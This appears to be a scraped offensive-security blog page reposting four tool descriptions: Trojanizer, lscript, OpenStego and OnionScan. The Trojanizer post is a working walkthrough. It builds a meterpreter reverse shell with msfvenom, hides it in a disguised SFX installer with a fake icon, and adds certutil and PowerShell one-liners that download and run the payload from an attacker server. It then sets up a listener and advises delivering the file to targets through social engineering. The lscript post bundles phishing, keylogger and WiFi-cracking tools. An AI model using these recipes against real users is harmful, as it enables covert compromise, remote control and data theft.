Security of Information, Threat Intelligence, Hacking, Offensive Security, Pentest, Open Source, Hackers Tools, Leaks, Pr1v8, Premium Courses Free, etc

  • Penetration Testing Distribution - BackBox

    BackBox is a penetration test and security assessment oriented Ubuntu-based Linux distribution providing a network and informatic systems analysis toolkit. It includes a complete set of tools required for ethical hacking and security testing...
  • Pentest Distro Linux - Weakerth4n

    Weakerth4n is a penetration testing distribution which is built from Debian Squeeze.For the desktop environment it uses Fluxbox...
  • The Amnesic Incognito Live System - Tails

    Tails is a live system that aims to preserve your privacy and anonymity. It helps you to use the Internet anonymously and circumvent censorship...
  • Penetration Testing Distribution - BlackArch

    BlackArch is a penetration testing distribution based on Arch Linux that provides a large amount of cyber security tools. It is an open-source distro created specially for penetration testers and security researchers...
  • The Best Penetration Testing Distribution - Kali Linux

    Kali Linux is a Debian-based distribution for digital forensics and penetration testing, developed and maintained by Offensive Security. Mati Aharoni and Devon Kearns rewrote BackTrack...
  • Friendly OS designed for Pentesting - ParrotOS

    Parrot Security OS is a cloud friendly operating system designed for Pentesting, Computer Forensic, Reverse engineering, Hacking, Cloud pentesting...
Showing posts with label Hidden. Show all posts
Showing posts with label Hidden. Show all posts

Tuesday, January 23, 2018

Trojanize Your Payload (WinRAR [SFX] Automatization) - Trojanizer


The Trojanizer tool uses WinRAR (SFX) to compress the two files input by user, and transforms it into an SFX executable(.exe) archive. The sfx archive when executed it will run both files (our payload and the legit appl at the same time).

To make the archive less suspicious to target at execution time, trojanizer will try to replace the default icon(.ico) of the sfx file with a user-selected one, and supress all SFX archive sandbox msgs (Silent=1 | Overwrite=1).

Trojanizer will not build trojans, but from target perspective, it replicates the trojan behavior'
(execute the payload in background, while the legit application executes in foreground).

DEPENDENCIES (backend applications)

Zenity (bash-GUIs) | Wine (x86|x64) | WinRAr.exe (installed-in-wine)
"Trojanizer.sh will download/install all dependencies as they are needed"

It is recomended to edit and config the option: SYSTEM_ARCH=[ your_sys_arch ] in the 'settings' file before attempting to run the tool for the first time.


PAYLOADS (agents) ACCEPTED

.exe | .bat | .vbs | .ps1
"All payloads that windows/SFX can auto-extract-execute"

HINT: If sellected 'SINGLE_EXEC=ON' in the settings file, then trojanizer will accept any kind of extension to be inputed.

LEGIT APPLICATIONS ACCEPTED (decoys)

.exe | .bat | .vbs | .ps1 | .jpg | .bmp | .doc | .ppt | etc ..
"All applications that windows/SFX can auto-extract-execute"

ADVANCED SETTINGS


Trojanizer 'advanced options' are only accessible in the 'settings' file, and they can only be configurated before running the main tool (Trojanizer.sh)

-- Presetup advanced option
Trojanizer can be configurated to execute a program + command before the extraction/execution of the two compressed files (SFX archive). This allow users to take advantage of pre-installed software to execute a remote command before the actual extraction occurs in target system. If active, trojanizer will asks (zenity sandbox) for the command to be executed 


-- single_file_execution
Lets look at the follow scenario: You have a dll payload to input that you need to execute upon extraction, but sfx archives can not execute directly dll files, This setting allow users to input one batch script(.bat) that its going to be used to execute the dll payload. All that Trojanizer needs to Do its to instruct the SFX archive to extract both files and them execute the script.bat 


single_file_execution switch default behavior its to compress the two files inputed by user but only execute one of them at extraction time (the 2º file inputed will be executed) ...

TROJANIZER AND APPL WHITELISTING BYPASSES

A lot of awesome work has been done by a lot of people, especially @subTee, regarding  application whitelisting bypass, which is eventually what we want here: execute arbitrary code abusing Microsoft built-in binaries. Windows oneliners to download remote payload and execute arbitrary code

The follow exercise describes how to use trojanizer 'single_file_execution' and 'Presetup' advanced switchs to drop (remote download) and execute any payload using 'certutil' or 'powershell' appl_whitelisting_bypass oneliners ...

1º - use metasploit to build our payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.69 LPORT=666 -f exe -o payload.exe

2º - copy payload.exe to apache2 webroot and start service
cp payload.exe /var/www/html/payload.exe
service apache2 start

3º - edit Trojanizer 'settings' file and activate:
PRE_SETUP=ON
SINGLE_EXEC=ON

4º - running trojanizer tool
PAYLOAD TO BE COMPRESSED => /screenshot.png (it will not matter what you compress)
EXECUTE THIS FILE UPON EXTRACTION => /AngryBirds.exe (to be executed as decoy application)
PRESETUP SANDBOX => cmd.exe /c certutil -urlcache -split -f 'http://192.168.1.69/payload.exe', '%TEMP%\\payload.exe'; Start-Process '%TEMP%\\payload.exe'
SFX FILENAME => AngryBirds_installer (the name of the sfx archive to be created)
REPLACE ICON => Windows-Store.ico OR Steam-logo.ico

5º - start a listenner, and send the sfx archive to target using social enginnering
msfconsole -x 'use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost 192.168.1.69; set lport 666; exploit'

When the sfx archive its executed, it will download payload.exe from our apache2 webserver to target and execute it before extract 'screenshot.png' and 'AngryBirds.exe' (last one will be executed to serve as decoy)

The follow oneliner uses 'powershell(Downloadfile+start)' method to achieve the same as previous 'certutil' exercise ..
cmd.exe /c powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://192.168.1.69/payload.exe', '%TEMP%\\payload.exe') & start '%TEMP%\\payload.exe'

The follow oneliner uses 'powershell(IEX+downloadstring)' method to achieve allmost the same (payload.ps1 does not touch disk)
cmd.exe /c powershell.exe -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.69/payload.ps1'))"

DOWNLOAD/INSTALL
1º - Download framework from github
     git clone https://github.com/r00t-3xp10it/trojanizer.git

2º - Set files execution permitions
     cd trojanizer
     sudo chmod +x *.sh

3º - config framework
     nano settings

4º - Run main tool
     sudo ./Trojanizer.sh

Framework Screenshots

xsf.conf - execute both files upon extraction (trojan behavior)



xsf.conf - single_file_execution + Presetup (advanced options)


xsf.conf - single_file_execution + Presetup + appl_whitelisting_bypass (certutil)


xsf.conf - single_file_execution + Presetup + appl_whitelisting_bypass (powershell IEX)


Final sfx archive with icon changed


Inside the sfx archive (open with winrar) - trojan behavior


Inside the sfx archive (open with winrar) - single_file_execution



Video tutorials

Trojanizer - single_file_execution (not trojan behavior)


Trojanizer - AVG anti-virus fake installer (trojan behavior)




Share:

Saturday, September 9, 2017

This script will make your life easier, and of course faster - lscript


This is a script that automates many procedures about wifi penetration and hacking.

Features

Enabling-Disabling interfaces faster Changing Mac faster Anonymizing yourself faster View your public IP faster View your MAC faster

TOOLS
You can install whichever tool(s) you want from within lscript! 
Fluxion    by Deltaxflux
WifiTe    by derv82
Wifiphisher   by Dan McInerney
Zatacker   by LawrenceThePentester
Morpheus   by Pedro ubuntu  [ r00t-3xp10it ]
Osrframework   by i3visio
Hakku    by 4shadoww
Trity    by Toxic-ig
Cupp    by Muris Kurgas
Dracnmap   by Edo -maland-
Fern Wifi Cracker  by Savio-code
Kichthemout   by Nikolaos Kamarinakis & David SchĂźtz
BeeLogger   by Alisson Moretto - 4w4k3
Ghost-Phisher   by Savio-code
Mdk3-master                     by Musket Developer
Anonsurf                        by Und3rf10w
The Eye                         by EgeBalci
Airgeddon                       by v1s1t0r1sh3r3
Xerxes                          by zanyarjamal
Ezsploit                        by rand0m1ze
Katana framework                by PowerScript
4nonimizer                      by Hackplayers
Sslstrip2                       by LeonardoNve
Dns2proxy                       by LeonardoNve
Pupy                            by n1nj4sec
Zirikatu                        by pasahitz
TheFatRat                       by Sceetsec
Angry IP Scanner                by Anton Keks
Sniper                          by 1N3
ReconDog                        by UltimateHackers
RED HAWK                        by Tuhinshubhra
Routersploit                    by Reverse shell
CHAOS                           by Tiagorlampert
Winpayloads                     by Ncc group 
Wifi password scripts
Handshake       (WPA-WPA2)
Find WPS pin    (WPA-WPA2)
WEP hacking     (WEP)    
Others
Email spoofing
Metasploit automation (create payloads,listeners,save listeners for later etc...)
Auto eternalblue exploiting (check on ks) -> hidden shortcuts

How to install
(make sure you are a root user)
Be carefull.If you download it as a .zip file, it will not run.Make sure to follow these simple instructions.
cd
git clone https://github.com/arismelachroinos/lscript.git
cd lscript
chmod +x install.sh
./install.sh

How to run it
(make sure you are a root user)
open terminal
type  "l"
press enter
(Not even "lazy"!! Just "l"! The less you type , the better!)

How to uninstall
cd /root/lscript
./uninstall.sh
rmdir -r /root/lscript 

How to update
Run the script
Type "update"

Things to keep in mind
1)you should be a root user to run the script
2)you should contact me if something doesnt work (Write it on the "issues" tab at the top)
3)you should contact me if you want a feature to be added (Write it on the "issues" tab at the top)

Video


Screenshots






Share:

Wednesday, September 7, 2016

Steganography Application (Data Hiding and Watermarking) - OpenStego



OpenStego is a steganography application that provides two functionalities:
  1. Data Hiding: It can hide any data within a cover file (e.g. images).
  2. Watermarking: Watermarking files (e.g. images) with an invisible signature. It can be used to detect unauthorized file copying. 

Usage
  • For GUI:
     java -jar lib\openstego.jar    

OR
Use the bundled batch file or shell script to launch the GUI.
  • For command line interface:
Refer to online documentation .

Plugins help
Please use the following command to get plugin specific help:
   java -jar lib\openstego.jar -help -a <algorithm_name>   


Developing new plugin
To add a new plugin, the following abstract class must be implemented:
net.sourceforge.openstego.OpenStegoPlugin
Read the API documentation for the details of the methods to be implemented. In addition, the following utility class can be used to handle multilingual string labels for the plugin:
net.sourceforge.openstego.util.LabelUtil
A new namespace should be added to LabelUtil class for each new plugin. Same namespace can also be used for exception messages while throwing OpenStegoException .
After implementing the plugin classes, create new file named OpenStegoPlugins.external and put the fully qualified name of the class which implements OpenStegoPlugin in the file. Make sure that this file is put directly under the CLASSPATH while invoking the application.
Please refer to the net.sourceforge.openstego.plugin.lsb package sources for sample plugin implementation.

Author
Samir Vaidya (syvaidya [at] gmail)
Copyright (c) 2007-2015

See Also
Project homepage: http://www.openstego.com
Blog: http://syvaidya.blogspot.com



Share:

Saturday, April 30, 2016

Onion Services Security Scan - OnionScan





The purpose of this tool is to make you a better onion service provider. You owe it to yourself and your users to ensure that attackers cannot easily exploit and deanonymize.

Go Dependencies
  • h12.me/socks - For the Tor SOCKS Proxy connection.
  • github.com/xiam/exif - For EXIF data extraction.
  • github.com/mvdan/xurls - For some URL parsing.

OS Package Dependencies
  • libexif-dev on Debian based OS
  • libexif-devel on Fedora

Installing

Install OS dependencies
  • On Debian based operating systems:
         sudo apt-get install libexif-dev    
  • On Fedora based operating systems:
         sudo dnf install libexif-devel    

Grab with go get

    go get github.com/s-rah/onionscan   


Compile/Run from git cloned source

    go install github.com/s-rah/onionscan   

and then run the program in

    ./bin/onionscan   
.
Or, you can just do

    go run github.com/s-rah/onionscan.go   

to execute without compiling.

Running

For a simple report detailing the high, medium and low risk areas found:

    ./bin/onionscan blahblahblah.onion   

The most interesting output comes from the verbose option:

    ./bin/onionscan --verbose blahblahblah.onion   

There is also a JSON output, if you want to integrate with something else:

    ./bin/onionscan --jsonReport blahblahblah.onion   

If you would like to use a proxy server listening on something other that

    127.0.0.1:9050   

, then you can use the --torProxyAddress flag:

    ./bin/onionscan --torProxyAddress=127.0.0.1:9150 blahblahblah.onion   


Apache mod_status Protection

This should not be news , you should not have it enabled. If you do have it enabled, attacks can:
  • Build a better fingerprint of your server, including php and other software versions.
  • Determine client IP addresses if you are co-hosting a clearnet site.
  • Determine your IP address if your setup allows.
  • Determine other sites you are co-hosting.
  • Determine how active your site it.
  • Find secret or hidden areas of your site
  • and much, much more.
Seriously, don't even run the tool, go to your site and check if you have /server-status reachable. If you do, turn it off!

Open Directories

Basic web security 101, if you leave directories open then people are going to scan them, and find interesting things - old versions of images, temp files etc.
Many sites use common structures style/ , images/ etc. The tool checks for common variations, and allows the user to submit others for testing.

EXIF Tags

Whether you create them yourself or allow users to upload images, you need to ensure the metadata associated with the image is stripped.
Many, many websites still do not properly sanitise image data, leaving themselves or their users at risk of deanonymization.

Server Fingerprint

Sometimes, even without mod_status we can determine if two sites are hosted on the sam infrastructure. We can use the following attributes to make this distinction:
  • Server HTTP Header
  • Technology Stack (e.g. php, jquery version etc.)
  • Website folder layout e.g. do you use /style or /css or do you use wordpress.
  • Fingerprints of images
  • GPG Versions being used.


Share:
Copyright © Offensive Sec Blog | Powered by OffensiveSec
Design by OffSec | Theme by Nasa Records | Distributed By Pirate Edition